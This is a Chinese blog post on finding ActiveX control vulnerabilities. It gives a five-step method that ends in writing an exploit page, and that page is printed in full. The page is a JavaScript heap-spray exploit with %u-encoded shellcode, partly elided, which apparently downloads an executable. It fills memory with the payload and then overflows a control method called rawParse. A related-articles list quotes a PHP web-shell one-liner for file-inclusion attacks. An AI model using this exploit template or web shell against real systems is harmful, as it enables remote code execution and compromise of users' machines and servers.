- <html>
- <object classid="clsid:6BE52E1D-E586-474f-A6E2-1A85A9B4D9FB" id='target'></object>
- <body>
- <SCRIPT language="javascript">
- var shellcode = unescape("%u9090"+"%u9090"+
- "%uefe9%u0000%u5a00%ua164%u0030%u0000%u408b%u8b0c" +
- 。。。。。。(省略)
- "%u6946%u656c%u0041%u7468%u7074%u2f3a%u312f%u3732" +
- "%u302e%u302e%u312e%u632f%u6c61%u2e63%u7865%u0065");
- </script>
- <SCRIPT language="javascript">
- var bigblock = unescape("%u9090%u9090");
- var headersize = 20;
- var slackspace = headersize+shellcode.length;
- while (bigblock.length<slackspace) bigblock+=bigblock;
- fillblock = bigblock.substring(0, slackspace);
- block = bigblock.substring(0, bigblock.length-slackspace);
- while(block.length+slackspace<0x40000) blockblock = block+block+fillblock;
- memory = new Array();
- for (x=0; x<300; x++) memory[x] = block + shellcode;
- var buffer = '';
- while (buffer.length < 4096) buffer+="\x0a\x0a\x0a\x0a";
- target.rawParse(buffer);
- </script>
- </body>
- </html>
ActiveX漏洞挖掘思路
原创
©著作权归作者所有:来自51CTO博客作者simeon2005的原创作品,谢绝转载,否则将追究法律责任
最近关于ActiveX控件漏洞猛报,利用工具也不少,特将其漏洞挖掘思路整理如下:
(1)下载并安装欲测试的软件
(2)使用COM Explorer软件查看ActiveX控件的各种属性
(3)通过VS2005对象浏览器查看控件中的变量、函数、函数参数,从中寻找可能存在漏洞的参数。
(4)进行漏洞的测试
(5)编写漏洞利用网页
网页大致内容如下:
上一篇:推荐一个好工具网站
下一篇:session欺骗利用思路
提问和评论都可以,用心的回复会被更多人看到
评论
发布评论
相关文章
-
Oracle-redo日志挖掘sql redo 日志挖掘
-
漏洞挖掘(1)
声明:谢绝一切形式的转载。在计算机的世界中,有输入的地方就有江湖,因为有输入的地方,
linux bc 测试用例 -
漏洞挖掘的艺术-面向源码的静态漏洞挖掘
件漏洞的挖掘一直是热门的方向,安全从业者们从一开始的手工挖洞,到后来编写自己的工具实现自动...
编程语言 java python 人工智能 linux -
漏洞挖掘 Java xstream 漏洞挖掘教程
手动漏洞挖掘本地文件包含lfi 查看文件 代码执行 <?php echo shell_exec($_GET['cmd']);?> Apache access.log远程文件包含rfi 出现概率少于lfi
漏洞挖掘 Java xstream Security+ 信息安全 安全 漏洞 -
java action 漏洞 java 漏洞挖掘
一、黑盒流量分析:java在Java反序列化传送的包中,通常有两种传送方式,在TCP报文中,通常二进制流方式传输,在HTTP报文中,则大多以base64传输。
java action 漏洞 Java序列化漏洞防护 反序列化 java Java